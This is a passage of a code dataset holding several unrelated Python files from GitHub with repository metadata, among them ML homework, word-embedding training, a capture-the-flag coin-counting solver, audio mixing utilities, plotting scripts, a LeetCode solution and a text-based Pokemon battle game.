KFold\nfrom keras import regularizers\n\ndef readdata(file_path):\n data = pd.read_csv(file_path)\n data[\"net_gain\"] = (data[\"capital_gain\"] - data[\"capital_loss\"] > 0).astype(\"int\")\n #data[\"is_adult\"] = (data[\"age\"] >= 21).astype(\"int\")\n #data = data[[col for col in data if not col.startswith('?_')]]\n data = data.values\n return data\n\ndef normalize(x_train, x_test):\n x_all = np.concatenate((x_train, x_test), axis = 0)\n mean = np.mean(x_all, axis = 0)\n std = np.std(x_all, axis = 0)\n\n index = [0, 1, 3, 4, 5]\n mean_vec = np.zeros(x_all.shape[1])\n std_vec = np.ones(x_all.shape[1])\n mean_vec[index] = mean[index]\n std_vec[index] = std[index]\n\n x_all_nor = (x_all - mean_vec) / std_vec\n\n x_train_nor = x_all_nor[0:x_train.shape[0]]\n x_test_nor = x_all_nor[x_train.shape[0]:]\n\n return x_train_nor, x_test_nor\n\ndef train(X_TRAIN, Y_TRAIN):\n model = Sequential()\n model.add(Dense(30, input_dim=x_train.shape[1], kernel_regularizer=regularizers.l2(0.001), init='uniform', activation='relu'))\n for i in range(6):\n model.add(Dense(100, kernel_regularizer=regularizers.l2(0.001), init='uniform', activation='relu'))\n Dropout(rate=0.5, seed=0)\n model.add(Dense(1, init='uniform', activation='sigmoid'))\n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n model.fit(X_TRAIN, Y_TRAIN, nb_epoch=100, batch_size=100, verbose=1)\n model.save(\"bashtest_PassStrong.h5\")\n return\n\ndef toclass(X):\n return np.around(X)\n\ndef predict_n_save(model, data, output_file):\n pred = toclass(model.predict(data)).astype(int).flatten()\n ans = pd.DataFrame({\"id\": np.arange(len(pred))+1, \"label\": pred})\n ans.to_csv(output_file,index=False)\n return\n\ndef main():\n if len(sys.argv) != 7:\n sys.exit(\"Usage: python3 $1 $2 $3 $4 $5 $6\")\n # load data\n x_train = readdata(sys.argv[3])\n y_train = pd.read_csv(sys.argv[4], header=None).values\n x_test = readdata(sys.argv[5])\n x_train, x_test = normalize(x_train, x_test)\n\n # X_TRAIN, X_TEST, Y_TRAIN, Y_TEST = train_test_split(x_train, y_train, test_size=0.3, random_state=0)\n # train(X_TRAIN, Y_TRAIN)\n\n model = load_model(\"FirstPassStrong.h5\")\n predict_n_save(model, x_test, sys.argv[6])\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"grceliu/ML-2019FALL","sub_path":"hw2/best.py","file_name":"best.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22525832632","text":"import fasttext\nimport time\n\ndef train(inp = \"wiki.he.text\",out_model = \"wiki.he.fasttext.model\",\n alg = \"CBOW\"):\n\n start = time.time()\n\n if alg == \"skipgram\":\n # Skipgram model\n model = fasttext.skipgram(inp, out_model)\n print(model.words) # list of words in dictionary\n else:\n # CBOW model\n model = fasttext.cbow(inp, out_model)\n print(model.words) # list of words in dictionary\n\n print(time.time()-start)\n \n model.save(out_model)\n\n\n\ndef getModel(model = \"wiki.he.fasttext.model.bin\"):\n\n model = fasttext.load_model(model)\n\n return model\n","repo_name":"liorshk/wordembedding-hebrew","sub_path":"fasttxt.py","file_name":"fasttxt.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"53"} +{"seq_id":"74589233127","text":"import socket\nimport math\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((\"misc.chal.csaw.io\", 8000))\nline = s.recv(1024).replace(b',',b'')\n\nprint(line)\nwhile True:\n if b'\\n' in line:\n print(line)\n firstLine = line.split(b'\\n')\n if len(firstLine) == 3:\n givenAmount = float(firstLine[1][1:])\n line = firstLine[2].replace(b',', b'')\n\n else:\n givenAmount = float(firstLine[0][1:])\n line = firstLine[1].replace(b',', b'')\n\n else:\n print(b'The line is: ' + line)\n if b'$' in line:\n dollar = line.index(b'$')\n space = line.index(b' ', dollar)\n amount = int(line[dollar+1:space])\n elif b'c' in line:\n if b'half-dollars' in line:\n amount = float(0.50)\n if b'quarters' in line:\n amount = float(0.25)\n if b'dimes' in line:\n amount = float(0.10)\n if b'nickels' in line:\n amount = float(0.05)\n if b'pennies' in line:\n amount = float(0.01)\n print(b'The given amount is: ',givenAmount)\n print(b'The amount is: ', amount)\n if (givenAmount == 0.00):\n s.send(b'0\\n')\n print(\"SENDINGx: 0\")\n elif (givenAmount >= amount):\n s.send(str(int(givenAmount/amount)) + b'\\n')\n print(\"SENDING:\" + str(int(givenAmount/amount)) + b'\\n')\n givenAmount -= round(amount * int(givenAmount/amount),2)\n givenAmount = round(givenAmount,2)\n else:\n s.send(b'0\\n')\n print(\"SENDINGy: 0\")\n line = s.recv(1024).replace(b',',b'')\n if not line:\n break\n\ns.close()","repo_name":"JonathanLPoch/Wargames","sub_path":"Programming/coinslot/coinslot.py","file_name":"coinslot.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21075064515","text":"import os\nimport numpy as np\nimport soundfile as sf\nfrom scipy.signal import resample_poly\n\n\ndef read_scaled_wav(path, start, end, scaling_factor, downsample_8K=False):\n samples, sr_orig = sf.read(path, start=start, stop=end)\n samples = samples / np.max(samples)\n\n if len(samples.shape) > 1:\n samples = samples[:, 0]\n\n if downsample_8K:\n samples = resample_poly(samples, 8000, sr_orig)\n samples *= scaling_factor\n return samples\n\n\ndef wavwrite_quantize(samples):\n return np.int16(np.round((2 ** 15) * samples))\n\n\ndef quantize(samples):\n int_samples = wavwrite_quantize(samples)\n return np.float64(int_samples) / (2 ** 15)\n\n\ndef wavwrite(file, samples, sr):\n \"\"\"This is how the old Matlab function wavwrite() quantized to 16 bit.\n We match it here to maintain parity with the original dataset\"\"\"\n int_samples = wavwrite_quantize(samples)\n sf.write(file, int_samples, sr, subtype='PCM_16')\n\n\ndef append_or_truncate(s1_samples, s2_samples, noise_samples, min_or_max='max', start_samp_16k=0, downsample=False):\n if downsample:\n speech_start_sample = start_samp_16k // 2\n else:\n speech_start_sample = start_samp_16k\n\n speech_end_sample = speech_start_sample + len(s1_samples)\n\n if min_or_max == 'min':\n noise_samples = noise_samples[speech_start_sample:speech_end_sample]\n else:\n s1_append = np.zeros_like(noise_samples)\n s2_append = np.zeros_like(noise_samples)\n s1_append[speech_start_sample:speech_end_sample] = s1_samples\n s2_append[speech_start_sample:speech_end_sample] = s2_samples\n s1_samples = s1_append\n s2_samples = s2_append\n\n return s1_samples, s2_samples, noise_samples\n\n\ndef fix_length(s1, s2, s3=[0], min_or_max='max'):\n if len(s3) > 1:\n # Fix length\n if min_or_max == 'min':\n utt_len = min(len(s1), len(s2), len(s3))\n s1 = s1[:utt_len]\n s2 = s2[:utt_len]\n s3 = s3[:utt_len]\n else: # max\n utt_len = min(len(s1), len(s2), len(s3))\n s1 = np.append(s1, np.zeros(utt_len - len(s1)))\n s2 = np.append(s2, np.zeros(utt_len - len(s2)))\n s3 = np.append(s3, np.zeros(utt_len - len(s3)))\n return s1, s2, s3\n else:\n # Fix length\n if min_or_max == 'min':\n utt_len = np.minimum(len(s1), len(s2))\n s1 = s1[:utt_len]\n s2 = s2[:utt_len]\n else: # max\n utt_len = np.maximum(len(s1), len(s2))\n s1 = np.append(s1, np.zeros(utt_len - len(s1)))\n s2 = np.append(s2, np.zeros(utt_len - len(s2)))\n return s1, s2\n \n\n\ndef create_wham_mixes(s1_samples, s2_samples, noise_samples):\n mix_clean = s1_samples + s2_samples\n mix_single = noise_samples + s1_samples\n mix_both = noise_samples + s1_samples + s2_samples\n return mix_clean, mix_single, mix_both\n\n\ndef create_overlap_mixes(s1_samples, s2_samples, s3_samples=[0], full_overlap=True):\n utt_overlaps = []\n utt_len = len(s1_samples)\n if full_overlap:\n overlap_ratios = [1.0]\n else:\n overlap_ratios = [1.0, 0.8, 0.6, 0.4, 0.2, 0.0]\n for overlap_ratio in overlap_ratios:\n append_len = int(utt_len * (0.5 - overlap_ratio / 2) / (0.5 + overlap_ratio / 2))\n if len(s3_samples) == 1:\n zero_append = np.zeros(append_len)\n s1_samples = np.append(s1_samples, zero_append)\n s2_samples = np.append(zero_append, s2_samples)\n mix_samples = s1_samples + s2_samples\n utt_overlaps.append(mix_samples)\n else:\n zero_append = np.zeros(append_len)\n half_append = np.zeros(append_len // 2)\n s1_samples = np.append(s1_samples, zero_append)\n s2_samples = np.append(s2_samples, half_append)\n s2_samples = np.append(half_append, s2_samples)\n s3_samples = np.append(zero_append, s3_samples)\n if len(s1_samples) != len(s2_samples): s2_samples = np.append(s2_samples, [0])\n mix_samples = s1_samples + s2_samples + s3_samples\n utt_overlaps.append(mix_samples)\n return utt_overlaps\n\n\ndef find_cospro_path(cospro_root, s_path):\n # find details of wav\n # ex: s_path: 03-M002_phrase_i_440_000000-000744.wav\n # set_dir: COSPRO_03\n # spk: M002\n # utt_dir: phrase_i\n # utt_num: 440\n # start: 000000\n # end: 000744\n details = s_path.split('.')[0].split('_')\n set_dir = f'COSPRO_{details[0][:2]}'\n spk = details[0].split('-')[-1]\n utt_dir = details[1]\n if set_dir == 'COSPRO_03':\n sub_utt_dir = details[2]\n elif set_dir == 'COSPRO_05':\n utt_dir = utt_dir + '_' + details[2]\n elif set_dir == 'COSPRO_08' and utt_dir == 'phrase':\n sub_utt_dir = details[2]\n elif set_dir == 'COSPRO_09' and len(details) == 5:\n utt_dir = utt_dir + '_' + details[2]\n utt_num = details[-2]\n start = details[-1].split('-')[0]\n start = float(start) / 100\n end = details[-1].split('-')[1]\n end = float(end) / 100\n \n # find wav dir\n if set_dir == 'COSPRO_02':\n if spk[0] == 'F':\n gender = 'Female'\n else:\n gender = 'Male'\n wav_dir = os.path.join(cospro_root, set_dir, gender, spk, utt_dir, 'wav')\n elif set_dir == 'COSPRO_03':\n wav_dir = os.path.join(cospro_root, set_dir, spk, utt_dir, sub_utt_dir, 'wav')\n elif set_dir == 'COSPRO_08' and utt_dir == 'phrase':\n wav_dir = os.path.join(cospro_root, set_dir, spk, utt_dir, sub_utt_dir, 'wav')\n else:\n wav_dir = os.path.join(cospro_root, set_dir, spk, utt_dir, 'wav')\n \n # find wav\n wav_name = None\n for wav in os.listdir(wav_dir):\n if utt_num in wav[14:]:\n if not wav.endswith('_f.wav') and not wav.endswith('_s.wav'):\n wav_name = wav\n break\n assert wav_name != None, f'We didn\\'t find {utt_num} in {wav_dir}'\n wav_path = os.path.join(wav_dir, wav_name)\n\n return wav_path, start, end\n\n\ndef find_tat_path(tat_root, s_path):\n # find details of wav\n # ex: s_path: train/condenser/KK_KKM0003_0049-6.9_0002010-0007950.wav\n # set_dir: TAT-Vol1-train\n # spk: KK_KKM0003\n # utt_name: 0049-6.9\n # start: 0002010\n # end: 0007950\n details = s_path.split('/')\n channel = details[1]\n wav_details = details[-1][:-4].split('_')\n\n spk = '_'.join([wav_details[0], wav_details[1]])\n\n utt_name = wav_details[-2]\n channels = ['XYH-6-X', 'XYH-6-Y', 'condenser', 'lavalier', 'ios', 'android']\n channel_num = channels.index(channel) + 1\n utt_name = utt_name + '-0' + str(channel_num) + '.wav'\n\n start = wav_details[-1].split('-')[0]\n start = float(start) / 1000\n end = wav_details[-1].split('-')[1]\n end = float(end) / 1000\n \n # find wav dir\n wav_dir = os.path.join(tat_root, 'TAT-Vol{}', 'TAT-{}-{}', channel, 'wav', spk)\n for vol in [(1, 'Vol1'), (2, 'vol2')]:\n wav_dir_trial = wav_dir.format(vol[0], vol[1], details[0])\n if os.path.isdir(wav_dir_trial):\n wav_path = os.path.join(wav_dir_trial, utt_name)\n\n return wav_path, start, end","repo_name":"Sinica-SLAM/COSPRO-mix","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10131905148","text":"import matplotlib.pyplot as plt\nimport glob\nimport numpy as np\nimport pandas as pd\nimport pickle\n\n\ndef plot_grid(n_samples_irl, res, all_weights, alg_names, save_path=None, fix_re_irl=False):\n mark = ['o', 'x', 's', '*', 'o', 'o']\n n_runs = res.shape[0]\n res_mean = np.mean(res, axis=0)\n res_std = 2 * np.std(res, axis=0) / np.sqrt(n_runs)\n\n df_border = pd.DataFrame()\n df_border['episodes'] = n_samples_irl\n fig, ax = plt.subplots(nrows=1, ncols=1)\n\n for i, name in enumerate(alg_names):\n mean_to_plot = res_mean[:, i]\n std_to_plot = res_std[:, i]\n if name == 're_irl' and fix_re_irl:\n paths = glob.glob('data/gridworld_reirl/gridworld_res_irl_all_0.1.npy')\n res = np.load(paths[0]) # = np.zeros((10, 10, 2, 3))\n mean_to_plot = np.mean(res, axis=0)[:, 0]\n std_to_plot = 2 * np.std(res, axis=0)[:, 0] / np.sqrt(n_runs)\n ax.plot(n_samples_irl, mean_to_plot, label=name, marker=mark[i])\n ax.fill_between(n_samples_irl, mean_to_plot + std_to_plot,\n mean_to_plot - std_to_plot, alpha=0.3)\n\n df_border[name + '_mean'] = mean_to_plot\n df_border[name + '_high'] = mean_to_plot + std_to_plot\n df_border[name + '_low'] = mean_to_plot - std_to_plot\n\n\n\n ax.set_xscale('log')\n ax.set_xlabel('Episodes (n)')\n ax.set_ylabel('Performance')\n ax.set_title('EXPERT 1: Go on Border')\n fig.tight_layout()\n\n ###############################################\n #\n #\n n_runs = all_weights.shape[0]\n res_mean = np.mean(all_weights, axis=0)\n res_std = 2 * np.std(all_weights, axis=0) / np.sqrt(n_runs)\n fig, ax = plt.subplots(nrows=1, ncols=1)\n\n for i, name in enumerate(alg_names):\n mean_to_plot = res_mean[:, i]\n std_to_plot = res_std[:, i]\n if name == 're_irl' and fix_re_irl:\n paths = glob.glob('data/gridworld_reirl/gridworld_res_irl_w_all_0.1.npy')\n res = np.load(paths[0]) # = np.zeros((10, 10, 2, 3))\n mean_to_plot = np.mean(res, axis=0)[:, 0]\n std_to_plot = 2 * np.std(res, axis=0)[:, 0] / np.sqrt(n_runs)\n\n ax.plot(n_samples_irl, mean_to_plot, label=name, marker=mark[i])\n ax.fill_between(n_samples_irl, mean_to_plot + std_to_plot,\n mean_to_plot - std_to_plot, alpha=0.3)\n\n df_border[name + '_w_mean'] = mean_to_plot\n df_border[name + '_w_high'] = mean_to_plot + std_to_plot\n df_border[name + '_w_low'] = mean_to_plot - std_to_plot\n\n\n ax.set_xscale('log')\n ax.set_xlabel('Episodes (n)')\n ax.set_ylabel('Norm difference of weights')\n ax.set_title('EXPERT 1: Go on Border')\n ax.legend()\n fig.tight_layout()\n if save_path is not None:\n df_border.to_csv(save_path + '/gridworld_border.csv', index=None)\n plt.show()\n\n\nif __name__ == '__main__':\n load_path = 'data/gridworld_original'\n try:\n with open(load_path + '/agents.pkl', 'rb') as handle:\n alg_names = pickle.load(handle)\n except:\n alg_names = ['GIRL', 'RA-GIRL', 'REIRL', 'REIRL-POS']\n alg_names += ['CSI', 'SCIRL']\n print(alg_names)\n # load returns\n # paths = glob.glob(load_path + '/gridworld_res_irl_all_0.0.npy')\n paths = glob.glob(load_path + '/gridworld_res_irl_0.0.npy')\n\n res = np.load(paths[0]) # = np.zeros((10, 10, 2, 3))\n # load weights\n # paths = glob.glob(load_path + '/gridworld_res_irl_w_all_0.0.npy')\n paths = glob.glob(load_path + '/gridworld_res_irl_w_0.0.npy')\n\n all_weights = np.load(paths[0])\n\n n_samples_irl = [2, 5, 10, 20, 50, 100, 200, 500, 1000,]\n\n plot_grid(n_samples_irl, res, all_weights, alg_names, load_path, fix_re_irl=True)\n","repo_name":"gioramponi/sigma-girl-MIIRL","sub_path":"plot_gridworld.py","file_name":"plot_gridworld.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"20366577739","text":"\"\"\"\r\nPaso de parámetros a funciones: por valor / por referencia\r\n\"\"\"\r\n\r\ndef referencia(Lista:list[int], c:set):\r\n for i in range(5):\r\n Lista.append(i)\r\n c.add(i)\r\n\r\ndef copia(num, s):\r\n num += 100\r\n s += 'hola'\r\n print('En copia: ', num, s)\r\n\r\nif __name__=='__main__':\r\n L = []\r\n c = {1,2,3}\r\n referencia(L, c)\r\n print('L',L)\r\n print('c',c)\r\n numero = 0\r\n s = \"una frase\"\r\n copia(numero, s)\r\n print(numero, s)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"aldebarran22/curso_santander_1","sub_path":"codigo_junio/funciones_parametros.py","file_name":"funciones_parametros.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5575201173","text":"import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport sys\nimport imp\nimport os\nimport seaborn as sns\nplt.rcParams.update({'figure.max_open_warning': 0})\n\n\nds_m = xr.open_dataset(r'/media/data2/SnowCast_station_data/merged/Hourly_Merged.nc')\nds_q = xr.open_dataset(r'/media/data2/SnowCast_station_data/QC/Hourly_QC.nc')\n\n# General plotting settings\nsns.set_style('ticks')\nsns.set_context(\"talk\", font_scale=1.5, rc={\"lines.linewidth\": 2.5})\n\n# time\n#ds_m = ds_m.sel(Time_UTC=slice(\"2014-10-01\",\"2017-09-28\"))\n#ds_q = ds_q.sel(Time_UTC=slice(\"2014-10-01\",\"2017-09-28\"))\n\n# vars_to_plot = ['SnowWaterEquivelentA','SnowDepthA','AirtemperatureA']\nvars_to_plot = ['IncrementalPrecipitationA']\nnetwork = 'ABE_AGG_HIST'\n# network = 'CRHO'\n# network = 'all'\n\nprint(set(ds_m.network.values))\nds_m = ds_m[vars_to_plot]\nds_q = ds_q[vars_to_plot]\n\nif network!='all':\n ds_m = ds_m.where(ds_m.network==network, drop=True)\n ds_q = ds_q.where(ds_q.network==network, drop=True)\n\nfor cvar in vars_to_plot:\n\n plt.figure()\n plt.title('Merged')\n #plt.plot(ds_m.Time_UTC, ds_m[cvar].sel(staID=['05BJ805' ,'05CA805' ,'2A32P' ,'2C14P' ,'PWL']))\n X = ds_m[cvar]\n for csta in X.staID:\n plt.plot(X.Time_UTC, X.sel(staID=csta),\n label=X.sel(staID=csta).station_name.values)\n plt.legend()\n\n plt.figure()\n plt.title('QC')\n #plt.plot(ds_q.Time_UTC, ds_q[cvar].sel(staID=['05BJ805' ,'05CA805' ,'2A32P' ,'2C14P' ,'PWL']))\n Y = ds_q[cvar]\n for csta in Y.staID:\n plt.plot(Y.Time_UTC, Y.sel(staID=csta),\n label=Y.sel(staID=csta).station_name.values)\n plt.legend()\n\nplt.show()\n\n\n","repo_name":"NicWayand/SnowCast","sub_path":"In_Situ_Data/Test_Plot_Data.py","file_name":"Test_Plot_Data.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10815149074","text":"class Solution(object):\n def canPartition(self, nums):\n s, n, memo = sum(nums), len(nums), {0: True}\n if s & 1: return False\n nums.sort(reverse=True)\n def dfs(i, x):\n if x not in memo:\n memo[x] = False\n if x > 0:\n for j in range(i, n):\n if dfs(j+1, x-nums[j]):\n memo[x] = True\n break\n return memo[x]\n return dfs(0, s >> 1)\n\nclass Solution(object):\n def canFindSum(self, nums, target, ind, n, d):\n if target in d: return d[target] \n if target == 0: d[target] = True\n else:\n d[target] = False\n if target > 0:\n for i in xrange(ind, n):\n if self.canFindSum(nums, target - nums[i], i+1, n, d):\n d[target] = True\n break\n return d[target]\n \n def canPartition(self, nums):\n s = sum(nums)\n if s % 2 != 0: return False\n return self.canFindSum(nums, s/2, 0, len(nums), {}) ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/November/27_PartitionEqualSubsetSum.py","file_name":"27_PartitionEqualSubsetSum.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3000973455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nTest case for thermal standardized load profile generation (SLP)\n\"\"\"\n\nfrom __future__ import division\n\nimport numpy as np\nfrom pycity_base.functions import slp_thermal as slp_th\n\n\nclass TestThermalSLP(object):\n\n def test_average_temperature(self):\n \"\"\"\n Test method for average temperature calculation\n \"\"\"\n test_temp_array = np.array([0, 0, 0, 0, 10, 10, 10, 10, 0, 0, 0, 0,\n 10, 10, 10, 10, 0, 0, 0, 0, 10, 10, 10,\n 10])\n average_temp = slp_th._average_temperature(test_temp_array)\n assert np.average(test_temp_array, weights=[1] + [2] * 22 + [3]) == average_temp[0]\n\n test_temp_array_2 = np.zeros(24*4)\n average_temp_2 = slp_th._average_temperature(test_temp_array_2)\n assert average_temp_2 == [0.0, 0.0, 0.0, 0.0]\n","repo_name":"RWTH-EBC/pyCity","sub_path":"pycity_base/test/test_thermal_slp.py","file_name":"test_thermal_slp.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"4624923657","text":"import random\nfrom pprint import pprint\nfrom Pokemon_get import get_all_pokemons\n\n\ndef get_player_profile(pokemon_list):\n return {\n \"player_name\": \"Seba\", # input(\"Cual es tu nombre?\\n\"),\n \"pokemon_inventory\": [random.choice(pokemon_list) for a in range(3)],\n \"combats\": 0,\n \"pokeballs\": 0,\n \"health_potion\": 0,\n }\n\n\ndef any_player_pokemon_lives(player_profile):\n for index in range(len(player_profile[\"pokemon_inventory\"])):\n if player_profile[\"pokemon_inventory\"][index][\"current_health\"] < 0:\n player_profile[\"pokemon_inventory\"][index][\"current_health\"] = 0\n\n return sum([pokemon[\"current_health\"] for pokemon in player_profile[\"pokemon_inventory\"]]) > 0\n\n\ndef choose_pokemon(player_profile):\n chosen = None\n\n inventory_length = player_profile[\"pokemon_inventory\"]\n\n\n while not chosen:\n print(\"Elige con que pokemon lucharás!\")\n for index in range(len(inventory_length)):\n print(\"{} - {}\".format(index, get_pokemon_info(inventory_length[index])))\n try:\n return inventory_length[int(input(\"Cual eliges? \\n\"))]\n except (ValueError, IndexError):\n print(\"Opcion invalida\")\n\n\ndef get_pokemon_info(pokemon):\n return \"{} | lvl {} | {} xp |hp {}/{}\".format(pokemon[\"name\"],\n pokemon[\"level\"],\n pokemon[\"current_exp\"],\n pokemon[\"current_health\"],\n pokemon[\"base_health\"])\n\n\ndef choose_attack(player_pokemon):\n chosen = None\n while not chosen:\n print(\"Elige el ataque!\")\n for index in range(len(player_pokemon[\"attacks\"])):\n #print(int(int(player_pokemon[\"attacks\"][index][\"min_level\"])/10), int(player_pokemon[\"level\"]))\n if player_pokemon[\"attacks\"][index][\"min_level\"] != \"\" and int(int(player_pokemon[\"attacks\"][index][\"min_level\"])/10) <= int(player_pokemon[\"level\"]) :\n \n if int(player_pokemon[\"attacks\"][index][\"damage\"]) == 0:\n \n player_pokemon[\"attacks\"][index][\"damage\"] = 25\n\n print(\"{} - {}\".format(index, get_pokemon_attacks(player_pokemon[\"attacks\"][index])))\n try:\n return player_pokemon[\"attacks\"][int(input(\"\\nCual eliges? \\n\"))]\n except (ValueError, IndexError):\n print(\"Opcion invalida\")\n\n\ndef get_pokemon_attacks(attack):\n return \"{} | daño {} | tipo {}\".format(attack[\"name\"],\n attack[\"damage\"],\n attack[\"type\"])\n\n\ndef player_attack(player_pokemon, enemy_pokemon):\n\n attack = choose_attack(player_pokemon)\n\n message_combat(player_pokemon, enemy_pokemon, attack)\n\n\ndef enemy_attack(enemy_pokemon, player_pokemon):\n\n attack = enemy_pokemon[\"attacks\"][random.randint(0, len(enemy_pokemon[\"attacks\"]) - 1)]\n\n message_combat(enemy_pokemon, player_pokemon, attack)\n\n\ndef message_combat(attacker, victim, attack):\n print(\"{} ataca con {}! \".format(attacker[\"name\"], attack[\"name\"]))\n\n print(\"-{} para {}!\".format(attack[\"damage\"], victim[\"name\"]))\n\n victim[\"current_health\"] -= attack[\"damage\"]\n\n\ndef fight(player_profile, enemy_pokemon):\n print(\"\\n--- NUEVO COMBATE ---\\n\")\n\n attack_history = []\n\n player_pokemon = choose_pokemon(player_profile)\n\n print(\"Contrincantes: {} VS {}\".format(get_pokemon_info(player_pokemon),\n get_pokemon_info(enemy_pokemon)))\n\n while any_player_pokemon_lives(player_profile) and enemy_pokemon[\"current_health\"] > 0:\n \n action = None\n\n while action not in [\"A\", \"P\", \"V\", \"C\", \"I\"]:\n\n action = input(\"¿Que deseas hacer?: [A]tacar, [C]ambiar, [I]tems, [P]okeball, Poción de [V]ida\\n\")\n\n if action == \"A\":\n \n if player_pokemon[\"current_health\"] > 0: \n\n player_attack(player_pokemon, enemy_pokemon)\n\n attack_history.append(player_pokemon)\n\n\n\n elif action == \"V\":\n \n \n #Si el usuario tiene curas en el inventario, se aplica 50, hasta llegar a 100ps\n\n #Si el usuario no tiene no cura\n\n cure_pokemon(player_profile, player_pokemon)\n\n elif action == \"P\":\n\n #pruebas(player_profile, enemy_pokemon)\n #Si el usuario tiene pokeballs en el inventario, capturara, con cierta probabilidad\n\n #relativa a la salud restante del pokemon, cuando se captura, pasa al inventario con la misma salud y toh.\n\n capture_with_pokeball(player_profile, enemy_pokemon)\n\n\n\n elif action == \"C\":\n\n player_pokemon = choose_pokemon(player_profile)\n\n elif action == \"I\":\n print(\"Tienes {} pokeballs y {} pociónes de vida\".format(player_profile[\"pokeballs\"],player_profile[\"health_potion\"]))\n\n if enemy_pokemon[\"current_health\"] > 0:\n \n enemy_attack(enemy_pokemon, player_pokemon)\n\n if player_pokemon[\"current_health\"] == 0 and any_player_pokemon_lives(player_profile):\n\n player_pokemon = choose_pokemon(player_profile)\n\n \n\n\n if enemy_pokemon[\"current_health\"] <= 0:\n\n print(\"\\n{} es derrotado!!\".format(enemy_pokemon[\"name\"]))\n\n item_lottery(player_profile) \n\n assign_exp(attack_history)\n \n\n\n\n\n# if enemy_pokemon[\"current_health\"] <= 0:\n# print(\"\\n{} es derrotado!!\".format(enemy_pokemon[\"name\"]))\n# item_lottery(player_profile)\n \n print(\"\\n--- FIN DEL COMBATE ---\\n\")\n\n input(\"Preciona ENTER para continuar...\")\n\n return player_profile\n\n\ndef item_lottery(player_profile):\n choice = random.choice([\"pokeballs\", \"health_potion\", \"health_potion\"])\n \n player_profile[choice] += 1\n\n if choice == \"pokeballs\":\n item = \"pokeball\"\n else:\n item = \"pocion de vida\"\n\n\n print(\"\\nHas obtenido una {}!! \".format(item))\n return player_profile\n\n\ndef assign_exp(attack_history):\n\n \n\n for pokemon in attack_history:\n\n points = random.randint(1, 5)\n\n \n\n pokemon[\"current_exp\"] += points\n\n if pokemon[\"current_exp\"] > 20:\n\n pokemon[\"current_exp\"] -= 20\n\n pokemon[\"level\"] += 1\n\n pokemon[\"current_health\"] = pokemon[\"base_health\"]\n\n print(\"Tu pokemon ha subido al nivel {}\".format(get_pokemon_info(pokemon)))\n\n\ndef cure_pokemon(player_profile, player_pokemon):\n\n if player_profile[\"health_potion\"] > 0:\n player_pokemon[\"current_health\"] += 50\n if player_pokemon[\"current_health\"] > player_pokemon[\"base_health\"]:\n player_pokemon[\"current_health\"] == player_pokemon[\"base_health\"]\n player_profile[\"health_potion\"] -= 1\n print(\"\\nHas usado una pocion de vida! +50 para {}\".format(player_pokemon[\"name\"]))\n\n return player_pokemon, player_profile\n else:\n print(\"No Tienes Poción\")\n\n\ndef capture_with_pokeball(player_profile, enemy_pokemon):\n \n if player_profile[\"pokeballs\"] > 0:\n random_num = random.randint(1, 64)\n \n if enemy_pokemon[\"current_health\"] <= 35 and random_num == 1 \\\n or enemy_pokemon[\"current_health\"] <= 30 and random_num <= 2 \\\n or enemy_pokemon[\"current_health\"] <= 25 and random_num <= 4 \\\n or enemy_pokemon[\"current_health\"] <= 20 and random_num <= 8 \\\n or enemy_pokemon[\"current_health\"] <= 15 and random_num <= 16 \\\n or enemy_pokemon[\"current_health\"] <= 10 and random_num <= 32 \\\n or enemy_pokemon[\"current_health\"] <= 5 and random_num <= 64 :\n print(\"Lo has capturado!\")\n player_profile[\"pokemon_inventory\"] += enemy_pokemon.copy(),\n enemy_pokemon[\"current_health\"] = 0\n return player_profile\n \n else:\n print(\"Fallaste\")\n \n pass\n\n player_profile[\"pokeballs\"] -= 1\n else:\n print(\"No Tienes pokeballs\")\n\n\ndef pruebas(player_profile, enemy_pokemon):\n # pprint(player_profile)\n # Buscamos los datos del pokemon\n # pprint(player_profile[\"pokemon_inventory\"])\n # obtenemos uno solo\n \"\"\" for h in range(len(player_profile[\"pokemon_inventory\"])):\n print(\"\\nLa vida actual del pokemon {} es {}\".format(player_profile[\"pokemon_inventory\"][h][\"name\"], player_profile[\"pokemon_inventory\"][h][\"current_health\"]))\n\n\n\n ataques = []\n for i in range(len(player_profile[\"pokemon_inventory\"][h][\"attacks\"])):\n\n ataques.append(player_profile[\"pokemon_inventory\"][h][\"attacks\"][i][\"name\"])\n \n \n\n\n print(\"y sus ataques son {}\".format(\",\".join(ataques)))\n print(\"\\n\")\n \"\"\"\n \ndef main():\n pokemon_list = get_all_pokemons()\n player_profile = get_player_profile(pokemon_list)\n\n # enemy_pokemon = random.choice(pokemon_list)\n\n # pruebas(player_profile, enemy_pokemon)\n \n while any_player_pokemon_lives(player_profile):\n\n while True:\n enemy_pokemon = random.choice(pokemon_list)\n if enemy_pokemon[\"current_health\"] > 0:\n break\n fight(player_profile, enemy_pokemon)\n\n\nif __name__ == \"__main__\":\n 